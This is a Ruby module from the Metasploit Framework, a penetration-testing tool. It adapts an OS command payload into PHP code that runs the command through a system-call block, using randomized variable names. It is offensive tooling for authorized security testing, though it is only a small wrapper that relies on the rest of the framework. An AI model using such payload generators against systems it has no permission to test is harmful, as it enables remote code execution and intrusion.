1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  include Msf::Payload::Adapter
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'OS Command Exec',
14
        'Description' => 'Execute an OS command from PHP',
15
        'Author' => 'Spencer McIntyre',
16
        'Platform' => 'php',
17
        'Arch' => ARCH_PHP,
18
        'License' => MSF_LICENSE,
19
        'AdaptedArch' => ARCH_CMD,
20
        'AdaptedPlatform' => 'unix'
21
      )
22
    )
23
  end
24

25
  def generate(_opts = {})
26
    payload = super
27

28
    vars = Rex::RandomIdentifier::Generator.new(language: :php)
29

30
    <<~TEXT
31
      #{Msf::Payload::Php.preamble(vars_generator: vars)}
32
      #{Msf::Payload::Php.system_block(vars_generator: vars, cmd: payload)}
33
      ?>
34
    TEXT
35
  end
36
end
37

38